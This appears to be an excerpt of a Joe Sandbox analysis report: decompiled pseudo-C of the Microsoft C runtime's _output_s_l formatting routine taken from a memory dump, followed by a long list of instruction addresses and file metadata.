    															E00B809F0(_t528, _t543, _t555, _t556,  &M00B77C38, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
    															 *(_t557 - 0x2f0) = 0xffffffff;
    															E00B7C650(_t557 - 0x40);
    															_t499 =  *(_t557 - 0x2f0);
    															L229:
    															return E00B805D0(_t499, _t528,  *(_t557 - 0x48) ^ _t557, _t547, _t555, _t556);
    														}
    													}
    												}
    												L219:
    												__eflags =  *(_t557 - 0x25c);
    												if( *(_t557 - 0x25c) == 0) {
    													L222:
    													 *(_t557 - 0x334) = 1;
    													L223:
    													_t530 =  *(_t557 - 0x334);
    													 *(_t557 - 0x2e0) =  *(_t557 - 0x334);
    													__eflags =  *(_t557 - 0x2e0);
    													if( *(_t557 - 0x2e0) == 0) {
    														_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
    														_push(0);
    														_push(0x8f5);
    														_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    														_push(2);
    														_t504 = L00B7D760();
    														_t559 = _t559 + 0x14;
    														__eflags = _t504 - 1;
    														if(_t504 == 1) {
    															asm("int3");
    														}
    													}
    													__eflags =  *(_t557 - 0x2e0);
    													if( *(_t557 - 0x2e0) != 0) {
    														 *(_t557 - 0x300) =  *(_t557 - 0x24c);
    														E00B7C650(_t557 - 0x40);
    														_t499 =  *(_t557 - 0x300);
    													} else {
    														 *((intOrPtr*)(L00B80C60(_t530))) = 0x16;
    														E00B809F0(_t528, _t530, _t555, _t556, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
    														 *(_t557 - 0x2fc) = 0xffffffff;
    														E00B7C650(_t557 - 0x40);
    														_t499 =  *(_t557 - 0x2fc);
    													}
    													goto L229;
    												}
    												L220:
    												__eflags =  *(_t557 - 0x25c) - 7;
    												if( *(_t557 - 0x25c) == 7) {
    													goto L222;
    												}
    												L221:
    												 *(_t557 - 0x334) = 0;
    												goto L223;
    											}
    										}
    										L187:
    										__eflags =  *(__ebp - 0x24);
    										if( *(__ebp - 0x24) == 0) {
    											L189:
    											 *(__ebp - 4) =  *(__ebp - 4) - 1;
    											 *(__ebp - 4) =  *(__ebp - 4) - 1;
    											__eax =  *(__ebp - 4);
    											 *( *(__ebp - 4)) = 0x30;
    											__ecx =  *(__ebp - 0x24);
    											__ecx =  *(__ebp - 0x24) + 1;
    											__eflags = __ecx;
    											 *(__ebp - 0x24) = __ecx;
    											goto L190;
    										}
    										L188:
    										__eax =  *(__ebp - 4);
    										__ecx =  *( *(__ebp - 4));
    										__eflags = __ecx - 0x30;
    										if(__ecx == 0x30) {
    											goto L190;
    										}
    										goto L189;
    									}
    									L183:
    									__eax =  *(__ebp - 8);
    									asm("cdq");
    									__ecx =  *(__ebp - 0x2bc);
    									__edx =  *(__ebp - 0x2c0);
    									__eax = E00B855B0( *(__ebp - 0x2c0),  *(__ebp - 0x2bc),  *(__ebp - 8),  *(__ebp - 0x2c0));
    									 *(__ebp - 0x2ac) = __eax;
    									__eax =  *(__ebp - 8);
    									asm("cdq");
    									__eax =  *(__ebp - 0x2bc);
    									__ecx =  *(__ebp - 0x2c0);
    									 *(__ebp - 0x2c0) = E00B85630( *(__ebp - 0x2c0),  *(__ebp - 0x2bc),  *(__ebp - 8), __edx);
    									 *(__ebp - 0x2bc) = __edx;
    									__eflags =  *(__ebp - 0x2ac) - 0x39;
    									if( *(__ebp - 0x2ac) > 0x39) {
    										__edx =  *(__ebp - 0x2ac);
    										__edx =  *(__ebp - 0x2ac) +  *(__ebp - 0x260);
    										__eflags = __edx;
    										 *(__ebp - 0x2ac) = __edx;
    									}
    									__eax =  *(__ebp - 4);
    									__cl =  *(__ebp - 0x2ac);
    									 *( *(__ebp - 4)) = __cl;
    									 *(__ebp - 4) =  *(__ebp - 4) - 1;
    									 *(__ebp - 4) =  *(__ebp - 4) - 1;
    									L181:
    									__ecx =  *(__ebp - 0x30);
    									 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    									 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    									__eflags =  *(__ebp - 0x30);
    									if( *(__ebp - 0x30) > 0) {
    										goto L183;
    									}
    									goto L182;
    								}
    							}
    							L168:
    							__eflags =  *(__ebp - 0x2b8);
    							if( *(__ebp - 0x2b8) >= 0) {
    								goto L170;
    							}
    							goto L169;
    							L170:
    							__ecx =  *(__ebp - 0x2b8);
    							 *(__ebp - 0x2c0) =  *(__ebp - 0x2b8);
    							__edx =  *(__ebp - 0x2b4);
    							 *(__ebp - 0x2bc) =  *(__ebp - 0x2b4);
    							goto L171;
    						}
    					}
    				}
    			}













    0x00b95717
    0x00b95717
    0x00b95717
    0x00b95717
    0x00b95721
    0x00b95721
    0x00b95721
    0x00b9572b
    0x00b9572b
    0x00b95731
    0x00b95733
    0x00b9573d
    0x00b9573d
    0x00b95740
    0x00b95743
    0x00b95743
    0x00b9576a
    0x00b9576a
    0x00b9576d
    0x00b9576d
    0x00b95772
    0x00b95794
    0x00b95794
    0x00b9579a
    0x00b957bc
    0x00b957bc
    0x00b957bf
    0x00b95806
    0x00b95806
    0x00b95809
    0x00b95826
    0x00b9582a
    0x00b95832
    0x00b95832
    0x00b95834
    0x00b9583a
    0x00b9580b
    0x00b9580b
    0x00b9580f
    0x00b95817
    0x00b95818
    0x00b9581e
    0x00b9581e
    0x00b957c1
    0x00b957c4
    0x00b957c4
    0x00b957c7
    0x00b957e5
    0x00b957f1
    0x00b957f4
    0x00b957f5
    0x00b957fb
    0x00b957c9
    0x00b957c9
    0x00b957cd
    0x00b957d5
    0x00b957d6
    0x00b957d7
    0x00b957dd
    0x00b957dd
    0x00b95801
    0x00b9579c
    0x00b9579c
    0x00b957a8
    0x00b957ae
    0x00b957ae
    0x00b95774
    0x00b95774
    0x00b95780
    0x00b95786
    0x00b95786
    0x00b95843
    0x00b95843
    0x00b95846
    0x00000000
    0x00000000
    0x00b95848
    0x00b95848
    0x00b9584f
    0x00000000
    0x00000000
    0x00b95851
    0x00b95851
    0x00b9585c
    0x00b95862
    0x00b95864
    0x00b9586a
    0x00b9586d
    0x00b9586f
    0x00b95875
    0x00b9587e
    0x00b95883
    0x00b958a0
    0x00b958a3
    0x00b958a3
    0x00b958a8
    0x00b958ad
    0x00b958ad
    0x00b958b3
    0x00b958b5
    0x00b958bb
    0x00b958c1
    0x00b958c1
    0x00b958ca
    0x00b958ca
    0x00b958b3
    0x00b958d0
    0x00b958d4
    0x00b958e2
    0x00b958e5
    0x00b958e8
    0x00b958ef
    0x00b958f1
    0x00b958f1
    0x00b958d6
    0x00b958d6
    0x00b958d6
    0x00b958fe
    0x00b958fe
    0x00b95904
    0x00b95906
    0x00b95906
    0x00b9590d
    0x00b95910
    0x00b95913
    0x00b95913
    0x00b95913
    0x00b95919
    0x00b9591c
    0x00b9591f
    0x00b95921
    0x00000000
    0x00000000
    0x00b95923
    0x00b95929
    0x00b95929
    0x00b9592f
    0x00b959ac
    0x00b959af
    0x00b959b2
    0x00b959b5
    0x00b959b8
    0x00b959bb
    0x00b959c1
    0x00b959c1
    0x00b959c7
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00b959fc
    0x00b959ff
    0x00b959ff
    0x00b95a02
    0x00b95a07
    0x00b95a07
    0x00b95a0c
    0x00b95a1e
    0x00b95a1e
    0x00b95a21
    0x00b95a33
    0x00b95a33
    0x00b95a36
    0x00b95a38
    0x00b95a3c
    0x00b95a3c
    0x00b95a23
    0x00b95a23
    0x00b95a27
    0x00b95a27
    0x00b95a0e
    0x00b95a0e
    0x00b95a12
    0x00b95a12
    0x00b95a0c
    0x00b95a46
    0x00b95a49
    0x00b95a4c
    0x00b95a55
    0x00b95a55
    0x00b95a58
    0x00b95a5a
    0x00b95a61
    0x00b95a65
    0x00b95a6e
    0x00b95a73
    0x00b95a76
    0x00b95a7d
    0x00b95a81
    0x00b95a85
    0x00b95a91
    0x00b95a94
    0x00b95a94
    0x00b95a97
    0x00b95a9c
    0x00b95a9c
    0x00b95a9f
    0x00b95aa1
    0x00b95aa8
    0x00b95aac
    0x00b95ab5
    0x00b95aba
    0x00b95a9f
    0x00b95abd
    0x00b95ac1
    0x00b95b95
    0x00b95b95
    0x00b95b9c
    0x00b95ba0
    0x00b95ba4
    0x00b95ba8
    0x00000000
    0x00b95ac7
    0x00b95ac7
    0x00b95ac7
    0x00b95acb
    0x00000000
    0x00000000
    0x00b95ad1
    0x00b95ad1
    0x00b95adb
    0x00b95ade
    0x00b95ae4
    0x00b95ae7
    0x00b95aed
    0x00b95aed
    0x00b95aed
    0x00b95af9
    0x00b95afc
    0x00b95b02
    0x00b95b04
    0x00000000
    0x00000000
    0x00b95b0a
    0x00b95b0a
    0x00b95b13
    0x00b95b1a
    0x00b95b24
    0x00b95b2b
    0x00b95b3a
    0x00b95b46
    0x00b95b49
    0x00b95b4f
    0x00b95b56
    0x00b95b61
    0x00b95b61
    0x00000000
    0x00b95b61
    0x00b95b58
    0x00b95b58
    0x00b95b5f
    0x00b95b6d
    0x00b95b6d
    0x00b95b74
    0x00b95b78
    0x00b95b86
    0x00000000
    0x00b95b8b
    0x00000000
    0x00b95b5f
    0x00b95b93
    0x00b95bb0
    0x00b95bb0
    0x00b95bb7
    0x00b95bbc
    0x00b95bbc
    0x00b95bbf
    0x00b95bc1
    0x00b95bc8
    0x00b95bcc
    0x00b95bd5
    0x00b95bda
    0x00b95bbf
    0x00b95bb7
    0x00b95bdd
    0x00b95bdd
    0x00b95be1
    0x00b95be9
    0x00b95bf1
    0x00b95bf1
    0x00b95bf8
    0x00b95bf8
    0x00b94ccf
    0x00b94cd5
    0x00b94ce2
    0x00b94ce7
    0x00000000
    0x00b94cfa
    0x00b94d04
    0x00b94d2b
    0x00b94d12
    0x00b94d23
    0x00b94d23
    0x00b94d04
    0x00b94d35
    0x00b94d3b
    0x00b94d47
    0x00b94d4a
    0x00b94d58
    0x00b94d5b
    0x00b94d68
    0x00b94e0d
    0x00b94e13
    0x00b94e19
    0x00b94e20
    0x00000000
    0x00000000
    0x00b94e26
    0x00b94e2c
    0x00000000
    0x00b94e33
    0x00b94e33
    0x00b94e4b
    0x00b94e50
    0x00b94e53
    0x00b94e55
    0x00b94f0f
    0x00b94f22
    0x00b94f27
    0x00000000
    0x00b94e5b
    0x00b94e6e
    0x00b94e73
    0x00b94e79
    0x00b94e7b
    0x00b94e84
    0x00b94e84
    0x00b94e87
    0x00b94e93
    0x00b94e97
    0x00b94e9d
    0x00b94e9f
    0x00b94ea4
    0x00b94ea6
    0x00b94eab
    0x00b94eb0
    0x00b94eb2
    0x00b94eb7
    0x00b94eba
    0x00b94ebd
    0x00b94ebf
    0x00b94ebf
    0x00b94ebd
    0x00b94ec0
    0x00b94ec0
    0x00b94ec7
    0x00000000
    0x00b94ec9
    0x00b94ece
    0x00b94eea
    0x00b94ef2
    0x00b94eff
    0x00b94f04
    0x00000000
    0x00b94f04
    0x00b94ec7
    0x00000000
    0x00b94f2f
    0x00b94f2f
    0x00b94f36
    0x00b94f39
    0x00b94f3c
    0x00b94f3f
    0x00b94f42
    0x00b94f45
    0x00b94f48
    0x00b94f4f
    0x00b94f56
    0x00000000
    0x00000000
    0x00b94f62
    0x00b94f62
    0x00b94f69
    0x00b94f75
    0x00b94f78
    0x00b94f7e
    0x00b94f85
    0x00000000
    0x00000000
    0x00b94f87
    0x00b94f87
    0x00b94f8d
    0x00b94f8d
    0x00b94f94
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b94fd7
    0x00b94fd7
    0x00b94fde
    0x00b94fe1
    0x00b9500b
    0x00b9500e
    0x00b9500e
    0x00b95011
    0x00b95018
    0x00b95018
    0x00b9501c
    0x00b94fe3
    0x00b94fe3
    0x00b94fef
    0x00b94ff2
    0x00b94ff6
    0x00b94ff8
    0x00b94ffb
    0x00b94ffb
    0x00b94ffe
    0x00b95004
    0x00b95006
    0x00b95006
    0x00b95009
    0x00000000
    0x00000000
    0x00b95024
    0x00b95024
    0x00000000
    0x00000000
    0x00b95030
    0x00b95030
    0x00b95037
    0x00b9503a
    0x00b9505a
    0x00b9505d
    0x00b9505d
    0x00b95067
    0x00b95067
    0x00b9506b
    0x00b9503c
    0x00b9503c
    0x00b95048
    0x00b9504b
    0x00b9504f
    0x00b95051
    0x00b95051
    0x00b95058
    0x00000000
    0x00000000
    0x00b95073
    0x00b95073
    0x00b9507a
    0x00b95086
    0x00b95089
    0x00b9508f
    0x00b95096
    0x00b951a9
    0x00000000
    0x00b951a9
    0x00b9509c
    0x00b9509c
    0x00b950a2
    0x00b950a2
    0x00b950a9
    0x00000000
    0x00b950df
    0x00b950df
    0x00b950e2
    0x00b950e5
    0x00b950e8
    0x00b95110
    0x00b95110
    0x00b95113
    0x00b95116
    0x00b95119
    0x00b9513e
    0x00b9513e
    0x00b95141
    0x00b95144
    0x00b95147
    0x00b95180
    0x00b95191
    0x00000000
    0x00b95191
    0x00b95149
    0x00b95149
    0x00b9514c
    0x00b9514f
    0x00b95152
    0x00000000
    0x00000000
    0x00b95154
    0x00b95154
    0x00b95157
    0x00b9515a
    0x00b9515d
    0x00000000
    0x00000000
    0x00b9515f
    0x00b9515f
    0x00b95162
    0x00b95165
    0x00b95168
    0x00000000
    0x00000000
    0x00b9516a
    0x00b9516a
    0x00b9516d
    0x00b95170
    0x00b95173
    0x00000000
    0x00000000
    0x00b95175
    0x00b95175
    0x00b95178
    0x00b9517b
    0x00b9517e
    0x00b95182
    0x00000000
    0x00b95182
    0x00000000
    0x00b9517e
    0x00b9511b
    0x00b9511b
    0x00b9511e
    0x00b95122
    0x00b95125
    0x00000000
    0x00b95127
    0x00b9512a
    0x00b9512d
    0x00b95130
    0x00b95133
    0x00b95139
    0x00000000
    0x00b95139
    0x00b95125
    0x00b950ea
    0x00b950ea
    0x00b950ed
    0x00b950f1
    0x00b950f4
    0x00000000
    0x00b950f6
    0x00b950f9
    0x00b950fc
    0x00b950ff
    0x00b95102
    0x00b95108
    0x00000000
    0x00b95108
    0x00000000
    0x00b95193
    0x00b95196
    0x00b95199
    0x00000000
    0x00000000
    0x00b950b0
    0x00b950b0
    0x00b950b3
    0x00b950b6
    0x00b950b9
    0x00b950d1
    0x00b950d4
    0x00b950d4
    0x00b950d7
    0x00b950bb
    0x00b950be
    0x00b950c1
    0x00b950c7
    0x00b950cc
    0x00b950cc
    0x00000000
    0x00000000
    0x00b9519e
    0x00b9519e
    0x00b951a1
    0x00b951a1
    0x00b951a6
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b951ae
    0x00b951ae
    0x00b951b5
    0x00b951c1
    0x00b951c4
    0x00b951ca
    0x00b951d1
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00b959f2
    0x00b951d7
    0x00b951dd
    0x00b951dd
    0x00b951e4
    0x00000000
    0x00b9553e
    0x00b9553e
    0x00b95545
    0x00b9554c
    0x00b9554c
    0x00b9554f
    0x00000000
    0x00000000
    0x00b951eb
    0x00b951ee
    0x00b951ee
    0x00b951f4
    0x00b951f6
    0x00b951f9
    0x00b951f9
    0x00b951fe
    0x00b951fe
    0x00000000
    0x00000000
    0x00b9532b
    0x00b9532e
    0x00b9532e
    0x00b95333
    0x00b95335
    0x00b95338
    0x00b95338
    0x00b9533e
    0x00b9533e
    0x00000000
    0x00000000
    0x00b9570b
    0x00b9570b
    0x00b95721
    0x00b95721
    0x00b9572b
    0x00b9572b
    0x00b95731
    0x00b95733
    0x00b9573d
    0x00b9573d
    0x00b95740
    0x00b95743
    0x00b95743
    0x00000000
    0x00000000
    0x00b95295
    0x00b95295
    0x00b952a1
    0x00b952a7
    0x00b952ae
    0x00b952bc
    0x00b952bc
    0x00b952c2
    0x00b952c5
    0x00b952d1
    0x00b95326
    0x00000000
    0x00b95326
    0x00b952b0
    0x00b952b0
    0x00b952b6
    0x00b952ba
    0x00b952d6
    0x00b952d9
    0x00b952d9
    0x00b952df
    0x00b95307
    0x00b9530e
    0x00b95314
    0x00b95317
    0x00b9531a
    0x00b95320
    0x00b95323
    0x00b952e1
    0x00b952e1
    0x00b952e7
    0x00b952ea
    0x00b952ed
    0x00b952f3
    0x00b952f6
    0x00b952f9
    0x00b952fb
    0x00b952fe
    0x00b952fe
    0x00000000
    0x00b952df
    0x00000000
    0x00000000
    0x00b95555
    0x00b95558
    0x00b9555b
    0x00b9555e
    0x00b95564
    0x00b95567
    0x00b9556e
    0x00b95572
    0x00b9557d
    0x00b9557d
    0x00b95581
    0x00b95598
    0x00b95598
    0x00b9559f
    0x00b955a1
    0x00b955a1
    0x00b955a8
    0x00b955a8
    0x00b955af
    0x00b955c0
    0x00b955cf
    0x00b955d2
    0x00b955d6
    0x00b955ec
    0x00b955d8
    0x00b955d8
    0x00b955db
    0x00b955e1
    0x00b955e7
    0x00b955e7
    0x00b955d6
    0x00b955f6
    0x00b955f9
    0x00b955fc
    0x00b955ff
    0x00b95602
    0x00b95605
    0x00b9560b
    0x00b95611
    0x00b95619
    0x00b9561a
    0x00b9561d
    0x00b9561e
    0x00b95621
    0x00b95622
    0x00b95629
    0x00b9562a
    0x00b9562d
    0x00b9562e
    0x00b95631
    0x00b95632
    0x00b95638
    0x00b95639
    0x00b95647
    0x00b95649
    0x00b9564f
    0x00b9564f
    0x00b95655
    0x00b95657
    0x00b9565b
    0x00b9565d
    0x00b95665
    0x00b95666
    0x00b95669
    0x00b9566a
    0x00b95678
    0x00b9567a
    0x00b9567a
    0x00b9565b
    0x00b9567d
    0x00b95684
    0x00b95687
    0x00b9568c
    0x00b9568c
    0x00b95692
    0x00b95694
    0x00b9569c
    0x00b9569d
    0x00b956a0
    0x00b956a1
    0x00b956b0
    0x00b956b2
    0x00b956b2
    0x00b95692
    0x00b956b5
    0x00b956b8
    0x00b956bb
    0x00b956be
    0x00b956c3
    0x00b956c9
    0x00b956cc
    0x00b956cf
    0x00b956cf
    0x00b956d2
    0x00b956d2
    0x00b956d5
    0x00b956e1
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00000000
    0x00b959f2
    0x00b95583
    0x00b95583
    0x00b9558a
    0x00b9558d
    0x00000000
    0x00000000
    0x00b9558f
    0x00b9558f
    0x00000000
    0x00b9558f
    0x00b95574
    0x00b95574
    0x00000000
    0x00000000
    0x00b95201
    0x00b95204
    0x00b95204
    0x00b9520a
    0x00b95265
    0x00b9526d
    0x00b95274
    0x00b9527a
    0x00b95280
    0x00b9520c
    0x00b9520c
    0x00b95216
    0x00b9521a
    0x00b95222
    0x00b95229
    0x00b95236
    0x00b9523d
    0x00b95249
    0x00b9524f
    0x00b95256
    0x00b95258
    0x00b95258
    0x00b9525f
    0x00b95287
    0x00b9528d
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00000000
    0x00b956e9
    0x00b956ec
    0x00b956ef
    0x00b956f2
    0x00b9576a
    0x00b9576d
    0x00b9576d
    0x00b95772
    0x00b95794
    0x00b95794
    0x00b9579a
    0x00b957bc
    0x00b957bc
    0x00b957bf
    0x00b95806
    0x00b95806
    0x00b95809
    0x00b95826
    0x00b9582a
    0x00b95832
    0x00b95832
    0x00b95834
    0x00b9583a
    0x00b9580b
    0x00b9580b
    0x00b9580f
    0x00b95817
    0x00b95818
    0x00b9581e
    0x00b9581e
    0x00b957c1
    0x00b957c4
    0x00b957c4
    0x00b957c7
    0x00b957e5
    0x00b957f1
    0x00b957f4
    0x00b957f5
    0x00b957fb
    0x00b957c9
    0x00b957c9
    0x00b957cd
    0x00b957d5
    0x00b957d6
    0x00b957d7
    0x00b957dd
    0x00b957dd
    0x00b95801
    0x00b9579c
    0x00b9579c
    0x00b957a8
    0x00b957ae
    0x00b957ae
    0x00b95774
    0x00b95774
    0x00b95780
    0x00b95786
    0x00b95786
    0x00b95843
    0x00b95843
    0x00b95846
    0x00000000
    0x00000000
    0x00000000
    0x00b95447
    0x00b95447
    0x00b95453
    0x00b95459
    0x00b9545e
    0x00b95460
    0x00b9550a
    0x00b9550d
    0x00b9550d
    0x00b95510
    0x00b95524
    0x00b9552a
    0x00b95530
    0x00b95512
    0x00b95512
    0x00b9551f
    0x00b9551f
    0x00b95532
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00b959f2
    0x00b95466
    0x00b95466
    0x00b95466
    0x00b95468
    0x00b95476
    0x00b9546a
    0x00b9546a
    0x00b9546a
    0x00b95480
    0x00b95486
    0x00b9548c
    0x00b95493
    0x00b95495
    0x00b9549a
    0x00b9549c
    0x00b954a1
    0x00b954a6
    0x00b954a8
    0x00b954ad
    0x00b954b0
    0x00b954b3
    0x00b954b5
    0x00b954b5
    0x00b954b3
    0x00b954b6
    0x00b954bd
    0x00b95505
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00b954bf
    0x00b954bf
    0x00b954c4
    0x00b954e0
    0x00b954e8
    0x00b954f2
    0x00b954f5
    0x00b954fa
    0x00000000
    0x00b954fa
    0x00000000
    0x00b9574c
    0x00b9574c
    0x00b95756
    0x00b95756
    0x00b9575c
    0x00b9575e
    0x00b95761
    0x00b95761
    0x00b95767
    0x00b95767
    0x00b9576a
    0x00b9576a
    0x00b9576d
    0x00b9576d
    0x00b95772
    0x00b95794
    0x00b95794
    0x00b9579a
    0x00b957bc
    0x00b957bc
    0x00b957bf
    0x00b95806
    0x00b95806
    0x00b95809
    0x00b95826
    0x00b9582a
    0x00b95832
    0x00b95832
    0x00b95834
    0x00b9583a
    0x00b9580b
    0x00b9580b
    0x00b9580f
    0x00b95817
    0x00b95818
    0x00b9581e
    0x00b9581e
    0x00b957c1
    0x00b957c4
    0x00b957c4
    0x00b957c7
    0x00b957e5
    0x00b957f1
    0x00b957f4
    0x00b957f5
    0x00b957fb
    0x00b957c9
    0x00b957c9
    0x00b957cd
    0x00b957d5
    0x00b957d6
    0x00b957d7
    0x00b957dd
    0x00b957dd
    0x00b95801
    0x00b9579c
    0x00b9579c
    0x00b957a8
    0x00b957ae
    0x00b957ae
    0x00b95774
    0x00b95774
    0x00b95780
    0x00b95786
    0x00b95786
    0x00b95843
    0x00b95843
    0x00b95846
    0x00000000
    0x00000000
    0x00000000
    0x00b95846
    0x00000000
    0x00b95704
    0x00b95704
    0x00000000
    0x00000000
    0x00b95341
    0x00b95341
    0x00b95345
    0x00b95353
    0x00b95356
    0x00b95347
    0x00b95347
    0x00b95347
    0x00b9535c
    0x00b95362
    0x00b95368
    0x00b95374
    0x00b9537a
    0x00b9537a
    0x00b95380
    0x00b953e7
    0x00b953e7
    0x00b953eb
    0x00b953ed
    0x00b953f3
    0x00b953f3
    0x00b953f6
    0x00b953f9
    0x00b953ff
    0x00b953ff
    0x00b953ff
    0x00b9540b
    0x00b9540e
    0x00b95414
    0x00b95416
    0x00000000
    0x00000000
    0x00b95418
    0x00b95418
    0x00b9541e
    0x00b95421
    0x00b95423
    0x00000000
    0x00000000
    0x00b95425
    0x00b9542b
    0x00b9542e
    0x00b9542e
    0x00b95436
    0x00b95436
    0x00b9543c
    0x00b9543c
    0x00b9543f
    0x00000000
    0x00b95382
    0x00b95382
    0x00b95382
    0x00b95386
    0x00b95388
    0x00b9538d
    0x00b9538d
    0x00b95390
    0x00b95397
    0x00b9539a
    0x00b953a0
    0x00b953a0
    0x00b953a0
    0x00b953ac
    0x00b953af
    0x00b953b5
    0x00b953b7
    0x00000000
    0x00000000
    0x00b953b9
    0x00b953b9
    0x00b953bf
    0x00b953c2
    0x00b953c4
    0x00000000
    0x00000000
    0x00b953c6
    0x00b953cc
    0x00b953cf
    0x00b953cf
    0x00b953d7
    0x00b953dd
    0x00b953e0
    0x00b953e2
    0x00b95442
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00b959f2
    0x00000000
    0x00b956fb
    0x00b956fb
    0x00b9576a
    0x00b9576a
    0x00b9576d
    0x00b9576d
    0x00b95772
    0x00b95794
    0x00b95794
    0x00b9579a
    0x00b957bc
    0x00b957bc
    0x00b957bf
    0x00b95806
    0x00b95806
    0x00b95809
    0x00b95826
    0x00b9582a
    0x00b95832
    0x00b95832
    0x00b95834
    0x00b9583a
    0x00b9580b
    0x00b9580b
    0x00b9580f
    0x00b95817
    0x00b95818
    0x00b9581e
    0x00b9581e
    0x00b957c1
    0x00b957c4
    0x00b957c4
    0x00b957c7
    0x00b957e5
    0x00b957f1
    0x00b957f4
    0x00b957f5
    0x00b957fb
    0x00b957c9
    0x00b957c9
    0x00b957cd
    0x00b957d5
    0x00b957d6
    0x00b957d7
    0x00b957dd
    0x00b957dd
    0x00b95801
    0x00b9579c
    0x00b9579c
    0x00b957a8
    0x00b957ae
    0x00b957ae
    0x00b95774
    0x00b95774
    0x00b95780
    0x00b95786
    0x00b95786
    0x00b95843
    0x00b95843
    0x00b95846
    0x00000000
    0x00000000
    0x00000000
    0x00b95846
    0x00000000
    0x00000000
    0x00000000
    0x00b959f2
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00000000
    0x00b959f6
    0x00000000
    0x00000000
    0x00b94fb1
    0x00b94fb4
    0x00b94fb7
    0x00000000
    0x00000000
    0x00b94fbc
    0x00b94fbf
    0x00b94fc4
    0x00000000
    0x00000000
    0x00b94fa6
    0x00b94fa6
    0x00b94fa9
    0x00b94fac
    0x00000000
    0x00000000
    0x00b94f9b
    0x00b94f9e
    0x00b94fa1
    0x00000000
    0x00000000
    0x00b94fc9
    0x00b94fc9
    0x00b94fcc
    0x00b94fcc
    0x00b94fcf
    0x00000000
    0x00000000
    0x00b94fd2
    0x00000000
    0x00000000
    0x00b94d6e
    0x00b94d70
    0x00b94d7e
    0x00b94d72
    0x00b94d72
    0x00b94d72
    0x00b94d88
    0x00b94d8e
    0x00b94d9b
    0x00b94d9d
    0x00b94da2
    0x00b94da4
    0x00b94da9
    0x00b94dae
    0x00b94db0
    0x00b94db5
    0x00b94dbb
    0x00b94dbd
    0x00b94dbd
    0x00b94dbb
    0x00b94dbe
    0x00b94dc5
    0x00000000
    0x00b94dc7
    0x00b94dcc
    0x00b94de8
    0x00b94df0
    0x00b94dfd
    0x00b94e02
    0x00b95cc1
    0x00b95cce
    0x00b95cce
    0x00b94dc5
    0x00b94d68
    0x00b95bfd
    0x00b95bfd
    0x00b95c04
    0x00b95c1b
    0x00b95c1b
    0x00b95c25
    0x00b95c25
    0x00b95c2b
    0x00b95c31
    0x00b95c38
    0x00b95c3a
    0x00b95c3f
    0x00b95c41
    0x00b95c46
    0x00b95c4b
    0x00b95c4d
    0x00b95c52
    0x00b95c55
    0x00b95c58
    0x00b95c5a
    0x00b95c5a
    0x00b95c58
    0x00b95c5b
    0x00b95c62
    0x00b95cad
    0x00b95cb6
    0x00b95cbb
    0x00b95c64
    0x00b95c69
    0x00b95c85
    0x00b95c8d
    0x00b95c9a
    0x00b95c9f
    0x00b95c9f
    0x00000000
    0x00b95c62
    0x00b95c06
    0x00b95c06
    0x00b95c0d
    0x00000000
    0x00000000
    0x00b95c0f
    0x00b95c0f
    0x00000000
    0x00b95c0f
    0x00b959f2
    0x00b959c9
    0x00b959c9
    0x00b959cd
    0x00b959da
    0x00b959dd
    0x00b959e0
    0x00b959e3
    0x00b959e6
    0x00b959e9
    0x00b959ec
    0x00b959ec
    0x00b959ef
    0x00000000
    0x00b959ef
    0x00b959cf
    0x00b959cf
    0x00b959d2
    0x00b959d5
    0x00b959d8
    0x00000000
    0x00000000
    0x00000000
    0x00b959d8
    0x00b95931
    0x00b95931
    0x00b95934
    0x00b95937
    0x00b9593e
    0x00b95945
    0x00b9594d
    0x00b95953
    0x00b95956
    0x00b95959
    0x00b95960
    0x00b9596c
    0x00b95972
    0x00b95978
    0x00b9597f
    0x00b95981
    0x00b95987
    0x00b95987
    0x00b9598d
    0x00b9598d
    0x00b95993
    0x00b95996
    0x00b9599c
    0x00b959a1
    0x00b959a4
    0x00b95913
    0x00b95913
    0x00b95919
    0x00b9591c
    0x00b9591f
    0x00b95921
    0x00000000
    0x00000000
    0x00000000
    0x00b95921
    0x00b95913
    0x00b95853
    0x00b95853
    0x00b9585a
    0x00000000
    0x00000000
    0x00000000
    0x00b95888
    0x00b95888
    0x00b9588e
    0x00b95894
    0x00b9589a
    0x00000000
    0x00b9589a
    0x00b9576a
    0x00b95721

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: __aulldiv__aullrem_get_int64_arg
    • String ID: '$0$9
